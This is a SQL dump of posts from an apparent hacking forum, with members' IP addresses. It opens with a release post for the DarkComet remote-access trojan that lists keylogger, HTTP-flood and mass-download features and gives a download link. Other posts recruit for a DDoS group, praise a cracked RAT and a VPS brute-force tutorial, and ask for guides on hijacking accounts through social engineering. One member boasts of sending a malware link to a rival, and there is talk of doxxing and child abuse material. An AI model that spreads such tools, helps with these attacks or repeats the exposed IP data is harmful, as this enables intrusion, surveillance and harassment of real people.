'1349887047', '[align=center][img]http://viprasys.org/xfs/image/direct/xLLpiu2Dky/darkcomet-5.3.1.png[/img]\n\nLatest stable version. ( Release date : 04/06/2012 at 20:04 )\nProduct version : v 5.3.1 FIX 1 fwb\nDirected and Coded by : Jean-Pierre LESUEUR ( DarkCoderSc )\nCoded using : Pascal / Delphi ; Assembler x86 ; PHP (Trace route; get IP WAN)\n \n\n\n\n[Curent Changes 5.3]\n\n- [FIX ] HTTP Flood more efficient\n- [FIX ] In settings the last theme is correctly set in the combobox\n- [FIX ] Auto SIN Refresh ratio successfully saved in config.ini\n- [GUI ] Client Settings GUI changed, it is now more user friendly and fit with the rest of DarkComet RAT Design\n- [GUI ] EULA At startup is more beautiful\n- [GUI ] No IP Gui revised\n- [GUI ] User group Gui revised\n- [FUNC] Search for update added in settings\n- [GUI ] Keylogger GUI revised\n- [FIX ] Now desktop correctly save snapshots (if option enabled) \n- [DEL ] Delete in full editor (read only, archived, tempory) attributes to avoid some stub problems if used\n- [FIX ] Users list flags support now Serbia Country (Republic of Serbia)\n- [FIX ] VIP Lounge price and URL fixed\n- [FUNC] HOT, Now you can chose wich functions you need in the control center, and not be bloated with functions you might never used. (In settings window)\n- [FIX ] FTP Upload Keylogger Logs bug fixed\n- [FUNC] FTP Wallet added in settings, it allow you to setup and test your FTP accounts for compatible DarkComet RAT FTP Functions\n- [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP Managment \n- [FUNC] Now you can upload files from file manager to one of your FTP account (compatible with the FTP Wallet)\n- [FUNC] Embedded FTP Client added to DarkComet, multithread using Pure API, very fast and reliable and of course user friendly.\n- [FIX ] Bug fixed when module startup enable, no more tons of process on reboot etc.. support Drag n Drop\n- [FUNC] Drag And Drop added in File Manager to upload files frop explorer directly to remote computer\n- [FUNC] New downloader method implemented using Pure low level API\'s instead of the **** URLDownloadUrlToFile bloated of crap\n- [FUNC] File Downloader manager from control center been improved and bug fixed, now file are correctly downloaded, also you can chose a PATH from combobox shortcut\n- [FUNC] Mass downloader from user list been improved and multithreaded, also download bug is now fixed\n- [FUNC] Same as for mass downloader, update from URL bug fixed and improved\n\n[lock]download: http://adf.ly/382489/http://ge.tt/15P04kN/v/0?c[/lock][/align]', '205.237.34.10', '-840097270', '1', '0', '1', '1352011006', '1', '646ee5f0a2f8d2ee7c0151f4cdb929a7', '0', '1352011006'); INSERT INTO mybb_posts VALUES('4178', '729', '4133', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349909426', '[quote=\'mothered\' pid=\'4133\' dateline=\'1349870117\']\nI don\'t use Skype, but shall forward this Info to friends.\n\nThanks for the heads up mate.\n[/quote]\n\nNo problem man, Just dont want anyone getting infected.', '75.38.19.52', '1260786484', '1', '0', '3', '1349909444', '1', '621963543f93f0f0a22a7e03b19a9015', '0', '1349909444'); INSERT INTO mybb_posts VALUES('4179', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349909600', 'All applicants will be contacted shortly.', '78.149.60.37', '1318403109', '1', '0', '0', '0', '1', '91d538046b14a6cec44b530ab60573a5', '0', '0'); INSERT INTO mybb_posts VALUES('4182', '788', '4130', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349911920', '[quote=\'iTzIpod\' pid=\'4130\' dateline=\'1349868202\']\nThat nigga named Theodore Bagwell...\nDidn\'t he die?\n[/quote]\n\nI don\'t know but I\'m by the part when he gets fucked up by the Feds in the van and Mahone etc find a post it note.\n\n[quote=\'??????????¢™\' pid=\'4176\' dateline=\'1349909098\']\n[quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\']\n[quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\']\nYep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.\n[/quote]\n\n:roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up.\n\nI agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards.\n[/quote]\n\nLOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh?\n[/quote]\n\n\n\nYeah that\'s the part I found funny and he did help us with 20 threads.', '72.231.24.165', '1223104677', '1', '0', '1', '1349911976', '1', '544bfb866eb2a3da9dd3b624e734c712', '0', '1349911976'); INSERT INTO mybb_posts VALUES('4181', '796', '4155', '15', 'RE: CyberGate v1.18.0 Full Version Cracked', '0', '100', '??zg???g????61', '1349910466', 'Thanks neon awesome thread ;)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6029e7b99b7db767cf59a414cd92d4a7', '0', '0'); INSERT INTO mybb_posts VALUES('4183', '788', '4182', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349912480', '[quote=\'t3h jok3r\' pid=\'4182\' dateline=\'1349911920\']\r\n[quote=\'iTzIpod\' pid=\'4130\' dateline=\'1349868202\']\r\nThat nigga named Theodore Bagwell...\r\nDidn\'t he die?\r\n[/quote]\r\n\r\nI don\'t know but I\'m by the part when he gets fucked up by the Feds in the van and Mahone etc find a post it note.\r\n\r\n[quote=\'??????????¢™\' pid=\'4176\' dateline=\'1349909098\']\r\n[quote=\'t3h jok3r\' pid=\'4122\' dateline=\'1349843007\']\r\n[quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\']\r\nYep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.\r\n[/quote]\r\n\r\n:roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up.\r\n\r\nI agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards.\r\n[/quote]\r\n\r\nLOL You laughed because I said \"Thanks to everyone except Anarchists.\" Huh?\r\n[/quote]\r\n\r\n\r\n\r\nYeah that\'s the part I found funny and he did help us with 20 threads.\r\n[/quote]\r\n\r\nI know but I dont like him thats why.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '842e6780608ecc64f678f7371721d4d7', '0', '0'); INSERT INTO mybb_posts VALUES('4184', '802', '0', '77', 'MW3 Knockback Lobby | FREE', '0', '3', '??????????¢™', '1349913454', '[b]Hello guys, I am hosting a MW3 knockback lobby on the xbox 360. If you would like to join just message the gamertag that will be at the bottom and I will invite you.[/b]\r\n\r\n[b][align=center][size=large][color=#FFD700]Status:[/color][/size][/align][/b] [b][align=center][size=large][color=#32CD32]Online/Open[/color][/size][/align][/b]\r\n\r\n[b][align=center][size=medium][color=#FFD700]GT: iPownaholic[/color][/size][/align][/b]', '75.38.19.52', '1260786484', '1', '0', '3', '1349913650', '1', '07807f2d06895705a22c1c7842de33c5', '0', '1349913650'); INSERT INTO mybb_posts VALUES('4185', '776', '4012', '16', 'RE: What are some things you want SE\'d?', '0', '61', 'NXK', '1349917955', 'This keyboard so bad aha\nhttp://www.razerzone.com/ca-en/store/razer-deathstalker-ultimate\n\nI can\'t get it, I\'m always declined -_-', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '7e26366fd42a12c72fde24d181bfb2a9', '0', '0'); INSERT INTO mybb_posts VALUES('4192', '779', '4023', '61', 'RE: Get everything for FREE', '0', '5', 'Timmy', '1349920588', 'When you mentioned Saga i knew which ebook you are talking about. I learned seing with his ebook very useful.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e22bfea9234fb0dd18e9ec6c7c8b65fa', '0', '0'); INSERT INTO mybb_posts VALUES('4193', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '5', 'Timmy', '1349920665', 'After reading what Jok3r posted its your fault.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6283f9d50b991e59561b166c7b59af21', '0', '0'); INSERT INTO mybb_posts VALUES('4194', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '222', 'Exposé', '1349920691', 'Lol I kicked you after you said you were done. I didn\'t kick you for no reason (facepalm)', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '123b759ddea7c334a794616cc7d960d1', '0', '0'); INSERT INTO mybb_posts VALUES('4195', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '5', 'Timmy', '1349920714', 'Brilliant idea and now that this group is invite only this group will succeed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9b7d28ffb40f26810981c24ca963172c', '0', '0'); INSERT INTO mybb_posts VALUES('4196', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '5', 'Timmy', '1349920787', 'Jok3r: Yeah baby\nTimmy: Yeah sugar\n\nLets make it to 5k posts now.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2e749701885cff7a780c83c41aa87d2', '0', '0'); INSERT INTO mybb_posts VALUES('4197', '791', '4134', '7', 'RE: Are you a morning person?', '0', '5', 'Timmy', '1349920985', 'Same here. Even if I sleep at 9 PM and wake up at 7 AM I can\'t get up even though it\'s more than or equal to 10 hours sleep I still can\'t get up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49a2062422a0f19f9ff414f4d0d2ab8f', '0', '0'); INSERT INTO mybb_posts VALUES('4198', '776', '4191', '16', 'RE: What are some things you want SE\'d?', '0', '5', 'Timmy', '1349921362', 'How about SEing companies or hacking accounts through SEing\r\n\r\n[quote=\'NXK\' pid=\'4191\' dateline=\'1349920231\']\r\n[quote=\'t3h jok3r\' pid=\'4190\' dateline=\'1349919919\']\r\nThere\'s nothing that I want SE\'d at the moment but maybe you can create a guide on SEing phones.\r\n[/quote]\r\nHmm I\'ve done this before, ill think about making a guide for this over the weekend.\r\n[/quote]\r\n\r\nAwesome i need this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f49e77614358f520ae141ef94118ed9a', '0', '0'); INSERT INTO mybb_posts VALUES('4199', '673', '4142', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349921461', '[quote=\'sirchamp\' pid=\'4142\' dateline=\'1349873517\']\r\nAlready knew this. You can also watch kids porn there.\r\n[/quote]\r\n\r\nBut isn\'t it too slow when you are accessing deep web?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ad9c17b0606349b53320dae212a1ca84', '0', '0'); INSERT INTO mybb_posts VALUES('4200', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '5', 'Timmy', '1349921631', 'Aight firstly I junked it myself so stop bugging out and update the thread. If you want something removed you contact staff', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '158e61d11c70603c86de3e89a3b436ce', '0', '0'); INSERT INTO mybb_posts VALUES('4201', '769', '3944', '23', 'RE: Math Tools for all Subjects Cracked by Rave', '0', '10', 'swa4567', '1349921767', 'Wow you crack programs thats so cool and is this the right section?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '9ea4b784529ceca77d213c5568b552bd', '0', '0'); INSERT INTO mybb_posts VALUES('4202', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '1', 't3h jok3r', '1349922749', 'If it is basically money for video gaming then why is it so popular?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd3db1485cf91b214d9c21d78202278ef', '0', '0'); INSERT INTO mybb_posts VALUES('4203', '190', '665', '56', 'RE: Copy and paste game', '0', '10', 'swa4567', '1349922826', 'http://www.anarchyforums.net/Thread-lets-all-betray-l33tshacking-net-im-neonlights-from-there-forum-time-to-act\n\nCopied that when someone told us on Skype that Neon left and joined AF.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a9cb22135ed72741f7df2909980eac1c', '0', '0'); INSERT INTO mybb_posts VALUES('4204', '487', '2354', '56', 'RE: Corrupt a wish', '0', '10', 'swa4567', '1349922872', 'Granted but then your own kids would fight for property and take all your money away\n\nI wish I had 1 billion dollars.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '3a2a8a3023ed07e3fb0f0c394173128e', '0', '0'); INSERT INTO mybb_posts VALUES('4205', '197', '696', '56', 'RE: /me Thread', '0', '10', 'swa4567', '1349922926', '/me asks ipod what COD are you playing', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0966be6ee040449d79959b47e7689d40', '0', '0'); INSERT INTO mybb_posts VALUES('4206', '238', '1021', '56', 'RE: Ban the user above you', '0', '10', 'swa4567', '1349922980', 'Banned because you have a win a netflix account contest.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a10e331f3cd3a0930ee2f41be77082cb', '0', '0'); INSERT INTO mybb_posts VALUES('4207', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '10', 'swa4567', '1349923048', 'No no no i win because i\'m unique', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1f4a10d4f1a2c67e504aa2fa0d09549f', '0', '0'); INSERT INTO mybb_posts VALUES('4208', '253', '1106', '56', 'RE: Count to 200', '0', '10', 'swa4567', '1349923081', '52. Bumping this thread up.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '78fa5190308deeee27e91e2ee7e6cea4', '0', '0'); INSERT INTO mybb_posts VALUES('4209', '804', '0', '42', 'Ninja caught in US Airport', '0', '10', 'swa4567', '1349923699', 'Watch video at: http://news.yahoo.com/video#video=30830518\n\nA Boston-bound man wearing body armor, flame retardant leggings and knee pads under his trench coat arrested at Los Angeles International Airport after a Customs and Border Protection officer found a smoke grenade and several weapons in his checked luggage is facing a federal charge for transporting hazardous material on an airplane.\n\nAccording to an affidavit filed in federal court, Yongda Huang Harris, 28, a naturalized U.S. citizen of Chinese descent, was flying from Kansai, Japan, via Inchon, Korea, to LAX on Friday.\n\nHe was pulled aside in customs for a secondary baggage inspection when an officer noticed Harris was wearing a bullet-proof vest. The officer asked Harris if he had anything he would like to declare in his checked luggage.\n\nHarris told the officer he had a knife, but when his bag was searched, the officer found a troubling array of suspicious items.\nIn addition to the smoke grenade, officers found three leather-coated black-jack billy clubs, a collapsible baton, a full-face respirator, several knives and a hatchet.\n\nPerhaps even more disturbing, officers also found body bags, a tyvex biohazard suit, various masks, duct tape, hand cuffs, leg irons, flex cuffs, oven mitts and cooking tongs.\n\nThe smoke grenade, manufactured by a company called Commando, is classified as an explosive and is capable of filling a 40,000-cubic-foot space with smoke, according to the affidavit. The grenade is also capable of causing a fire.\nIt is not clear why Harris had those items in his luggage, but the investigation is ongoing.\nAuthorities say they are working with investigators in Japan, where Harris has been living, to learn more about why he would bring such an alarming assortment of implements on board an international flight. LAPD and FBI are assisting in the investigation.', '72.231.24.165', '1223104677', '0', '0', '10', '1349923780', '1', 'cacaf0f507bac8304a4f30457ca298f5', '0', '1349923780'); INSERT INTO mybb_posts VALUES('4210', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '61', 'NXK', '1349924470', 'You\'re so LQ anyways, No one really cares.. But you threaten to DDoS us. Which was a wrong move on your choice, You know what was to come.\n\"ddos request sent to multiple areas \nwanna join in?\n\nwanna take them down?\n\nlets do it !\n\nif ur interested in attacking there forum for betraying us and most of the cybernet\nthen leave a reply\n\nim tired of them...\"', '99.253.94.204', '1677549260', '1', '0', '61', '1349925743', '1', '9caef4e8dd306a69ac8102d3720fae6c', '0', '1349925743'); INSERT INTO mybb_posts VALUES('4211', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1349924837', 'Right move, thanks for taking immediate action NXK.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '645176c0eeb19052543f061b7f40e9b2', '0', '0'); INSERT INTO mybb_posts VALUES('4212', '791', '4151', '7', 'RE: Are you a morning person?', '0', '205', 'mothered', '1349928043', '[quote=\'NXK\' pid=\'4151\' dateline=\'1349883297\']\r\nYou\'re exactly like me, that\'s why I just gave up on going to bed early, I go to sleep ay like 1am everyday and wake up at 6am daily.. My first 2 classes are hell.\r\n[/quote]\r\n\r\nI used to sleep very similar hours, but It does tend to catch up with you.\r\n\r\nI try and sleep by 12am, (on work days), and wake up at 8am. I\'m still bloody wrecked though. When I don\'t have work, It\'s between 3-4am, and get up after noon.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cdede4fb5c8f5e5c6f7268cfa379e4ea', '0', '0'); INSERT INTO mybb_posts VALUES('4213', '563', '4160', '25', 'RE: Virus Removal Tools', '0', '205', 'mothered', '1349928356', '[quote=\'NeonLights\' pid=\'4160\' dateline=\'1349887540\']\r\nuseless thread...\r\nwaste of time lmao why did u even spend time doing this?\r\n[/quote]\r\n\r\nSo people like you, can comment with Immaturity and childish remarks.\r\n\r\nBy the way, great to see you leave :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '99714f0aa08b908321e0cca0ce1cc9df', '0', '0'); INSERT INTO mybb_posts VALUES('4214', '791', '4134', '7', 'RE: Are you a morning person?', '0', '2', 'Apathy', '1349930427', 'Nope I sleep on average about 6 hours(stay up too late) and I feel like shit in the morning.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '199278fee2bc67b476c78c291964c03a', '0', '0'); INSERT INTO mybb_posts VALUES('4215', '788', '4196', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349933162', '[quote=\'Timmy\' pid=\'4196\' dateline=\'1349920787\']\r\nJok3r: Yeah baby\r\nTimmy: Yeah sugar\r\n\r\nLets make it to 5k posts now.\r\n[/quote]\r\n\r\nWe are working on getting it to 5k posts.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '99de24ef5748355b97559dc93e4b9d36', '0', '0'); INSERT INTO mybb_posts VALUES('4216', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '3', '??????????¢™', '1349933219', 'Thank god he is banned, he wasnt active anyways.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'e2350fbe53455cfc2a4ef94a9a5493d1', '0', '0'); INSERT INTO mybb_posts VALUES('4217', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '3', '??????????¢™', '1349933339', 'Wow might have been getting ready for another slaughter like that batman one.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'db3605657ec1edd3d0d798e22bd6c9e8', '0', '0'); INSERT INTO mybb_posts VALUES('4218', '791', '4134', '7', 'RE: Are you a morning person?', '0', '3', '??????????¢™', '1349933392', 'Same here, If I sleep all day as soon as I get home from school I will still be tired and lazy in the morning.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '5c1f7e844e19944909bdadfa64b21767', '0', '0'); INSERT INTO mybb_posts VALUES('4219', '792', '4195', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1349945537', '[quote=\'Timmy\' pid=\'4195\' dateline=\'1349920714\']\r\nBrilliant idea and now that this group is invite only this group will succeed.\r\n[/quote]\r\n\r\nthanks for the feedback, please feel free to give any suggestions you might have to add new rules', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', '27cc1ceb34cc9ca337976b9d04ea95cf', '0', '0'); INSERT INTO mybb_posts VALUES('4220', '779', '4023', '61', 'RE: Get everything for FREE', '0', '62', 'R?????zo?', '1349945607', 'It\'s a great ebook indeed.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', '96f53765672393d5ca063a3c00b0d8c2', '0', '0'); INSERT INTO mybb_posts VALUES('4221', '776', '4185', '16', 'RE: What are some things you want SE\'d?', '0', '62', 'R?????zo?', '1349945714', '[quote=\'NXK\' pid=\'4185\' dateline=\'1349917955\']\r\nThis keyboard so bad aha\r\nhttp://www.razerzone.com/ca-en/store/razer-deathstalker-ultimate\r\n\r\nI can\'t get it, I\'m always declined -_-\r\n[/quote]\r\n\r\nwould love this aswell.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', 'f04682f9b4cf19621b7dec46666e2748', '0', '0'); INSERT INTO mybb_posts VALUES('4222', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '62', 'R?????zo?', '1349945782', 'Nice tutorial, thanks for sharing.', '89.214.184.154', '1507244186', '1', '0', '0', '0', '1', 'a42ab001e29f6a9b98b2aff9983e7ad6', '0', '0'); INSERT INTO mybb_posts VALUES('4223', '805', '0', '47', 'Win 5 likes on your youtube video', '0', '53', 'sirchamp', '1349948717', 'Just chose a number from 1-5\r\n\r\nI will use random.org to chose the winner\r\n\r\nThe winner will get 5 likes on his youtube video. Pretty crappy prize I know but its better than nothing.\r\n\r\nI will decide a winner once all the numbers are filled\r\n\r\n-Requirements: None\r\n\r\n1.\r\n2. \r\n3.\r\n4. \r\n5. \r\n\r\n\r\nGood luck', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c04745ff909c25e9035f4836a07ed142', '0', '0'); INSERT INTO mybb_posts VALUES('4224', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '100', '??zg???g????61', '1349952271', 'Well its not exactly that, think of it as paypal, but without limits.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c5bba9adec6aeff31ad446e599daa452', '0', '0'); INSERT INTO mybb_posts VALUES('4225', '806', '0', '58', '[NEW] (Recruiting) DDoS\'ers - Join today', '0', '100', '??zg???g????61', '1350921780', '[align=center][size=medium][color=#E6E6FA]\n\n[color=#DAA520]Hello everybody, GRONgamer here. This is the Official recruitment thread for my new group - DDoS\'ers. I have made this group because I have always had a great interest in networking, and run my own DDoS\'ing service. (Click my signature :P)as long as you meet the small requirements I\'ve listed below.[/color]\n\n[color=#FF4500]\n1.) Must have at LEAST 30+ posts.\n\n2.) Must have at least 1 or more positive rep.\n\n3.) Must have at least a basic understanding of networking.\n\n4.) Must be able to answer a few simple questions I throw at you.[/color]\n\n\nPlease PM me if you would like to join, you don\'t need to fill out an application just PM saying you\'d like to join and I\'ll reply with a few questions or turn you down. \n\n[/color][/size][/align]\n\nalso if you guys could bump this that would be great. :)', '96.237.179.21', '1096865674', '1', '0', '100', '1350939045', '1', '2f1fc5a71b0f93ab6008c6bbe86aa96b', '0', '1350939045'); INSERT INTO mybb_posts VALUES('4226', '801', '4177', '7', 'RE: [IMPORTANT] <Bitcoin Explained> [IMPORTANT]', '0', '53', 'sirchamp', '1349954251', 'Its not money for video gaming. Its a similar principle. Bitcoins are real money.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'cbd9e271491aac87d957d09c69a178a8', '0', '0'); INSERT INTO mybb_posts VALUES('4227', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349955578', 'Woah. Nice avatar :o Sexy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '50f8be84f18e917f5fb1c6abc667bdde', '0', '0'); INSERT INTO mybb_posts VALUES('4228', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349955614', 'But the captcha they have are easy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a67404d5ffe9e5c1d563f7b4674b9123', '0', '0'); INSERT INTO mybb_posts VALUES('4229', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349955648', 'Thanks. :D \n\nWelcome to LH .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6cbdc1bc053b00fee0aa84a2b3f65e9d', '0', '0'); INSERT INTO mybb_posts VALUES('4230', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1349955720', 'My friend got infected. And I almost clicked on the link.\n\nBut then I just copied it and gave it to someone on Facebook that doesn\'t like me. And I don\'t like him either. So I think he clicked on it not sure..\n\nBut I knew it was a Hotfile.com link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f31050e6e7d739022e92c1e62a4e1d5f', '0', '0'); INSERT INTO mybb_posts VALUES('4231', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349955777', 'The admin closed the thread ^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44e721aaf29b2ae6c49c8a4813c2471f', '0', '0'); INSERT INTO mybb_posts VALUES('4232', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349955825', 'Granted but your house burned to the ground + the $1,000,000,000.\n\nI wish I was Rainbow Dash <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9abd8dafd179163ba0c42600bf900067', '0', '0'); INSERT INTO mybb_posts VALUES('4233', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349955891', '/me fucking hates t3h jok3r for releasing my dox.\n\n\n\n\nYou could\'ve allowed TheAnarchist to do it instead. \nIf you did so, we could\'ve still been friends. And my dox would\'ve been released by him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ad46ed11cf9385195d34dd419ecc4f6', '0', '0'); INSERT INTO mybb_posts VALUES('4234', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349955926', 'Banned for noticing .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '900aa153de2aa2ff42fc87a6f80360eb', '0', '0'); INSERT INTO mybb_posts VALUES('4235', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349955979', '53. You can count?!!?!?! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9855b368a612cf15b80f7e2c6282b71', '0', '0'); INSERT INTO mybb_posts VALUES('4236', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1349956085', 'Gratz LH. Thanks to everyone who posted.\nMostly me.\nThank you iTzIpod I love you', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '82922a0866f0680d3f5acd9837209b11', '0', '0'); INSERT INTO mybb_posts VALUES('4237', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1349956226', 'NL is actually a good member. He contributed a lot of posts and threads to LH.\nBut since he betrayed us.. We can\'t really go back for him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de65050a6a07dea9db7d4cef6bb583e5', '0', '0'); INSERT INTO mybb_posts VALUES('4238', '807', '0', '34', '[ Get ] Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '17', '228', 'VirtualLegend', '1349957220', '[align=justify][color=#32CD32][size=medium]What\'s Up,\r\n\r\nToday i have a intrested Graphics Kit for you. It\'s called Ninja Graphics Kit and it cost around 40 dollars. \r\nI\'m not all about money so thats why i will give you all guys the Graphics Kit. [/size][/color]\r\n\r\n[color=#800080][size=large]What is in the Graphics Kit:\r\n- Add to the C@RD buttons\r\n- Guarantee Badges\r\n- OptimizePress Headers\r\n- Aristocracy Icon Set\r\n- Iphone Mockup Templates\r\n- Pricing Tables\r\n- Download Buttons\r\n- Credit Card Icons\r\n- Product cover Graphics\r\n- Handdrawn Doodles\r\n- Headlines\r\n- Logo Templates[/size][/color]\r\n\r\n[color=#FF0000][size=x-large]AND MUCH MORE !!![/size][/color]\r\n\r\n[color=#FFD700][size=medium]My opinion is that this will help you alot as a designer.[/size][/color]\r\n\r\n[u][b][color=#FF1493][size=medium]Download Link:[/size][/color][/b][/u] [quote]http://www.ninjagraphicskit.com/ty0011180dypdy2099.html[/quote]\r\n\r\n[color=#00BFFF][size=large]If you want to show your appreciation just leave a Nice Comment Below, and I\'m always open for Tips and Questions.\r\n[/size][/color][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'ab840039713ec5eb66c744ae198154ab', '0', '0'); INSERT INTO mybb_posts VALUES('4239', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '205', 'mothered', '1349958049', 'His attitude Is not In the right perspective. \r\n\r\nWhen things go wrong, rather than taking responsibility for his own actions, he looks for someone else to blame.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4c2da401e9049436ae8059c8387144bc', '0', '0'); INSERT INTO mybb_posts VALUES('4240', '782', '4052', '7', 'RE: We need to advertise!', '0', '205', 'mothered', '1349958235', 'I agree, but the problem with advertising In forums, Is that they don\'t allow the advertising of competitive forums In their rules.\r\n\r\nFacebook and word of mouth, can do quite well.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b4a56b9bb890edacaef99bf439c1e7d9', '0', '0'); INSERT INTO mybb_posts VALUES('4241', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349959546', 'thanks but was not me who made it :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'c7d35fa2069091199b6e18f2a2962977', '0', '0'); INSERT INTO mybb_posts VALUES('4242', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '62', 'R?????zo?', '1349959582', 'great ebook, I will give logitech a try, really need that keyboard :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '822eb781444f290c7c27480d7fdf4110', '0', '0'); INSERT INTO mybb_posts VALUES('4243', '782', '4052', '7', 'RE: We need to advertise!', '0', '62', 'R?????zo?', '1349959657', 'we have been banned from google so the only thing we can do is refer members.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '305a522e8a77ef5a2b6d260f294a834e', '0', '0'); INSERT INTO mybb_posts VALUES('4244', '190', '4203', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349959760', '[quote=\'swa4567\' pid=\'4203\' dateline=\'1349922826\']\r\nhttp://www.anarchyforums.net/Thread-lets-all-betray-l33tshacking-net-im-neonlights-from-there-forum-time-to-act\r\n\r\nCopied that when someone told us on Skype that Neon left and joined AF.\r\n[/quote]\r\n\r\nwhat a jerk.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '2e7fd6fdfb3d3375eea81f5d827d4b48', '0', '0'); 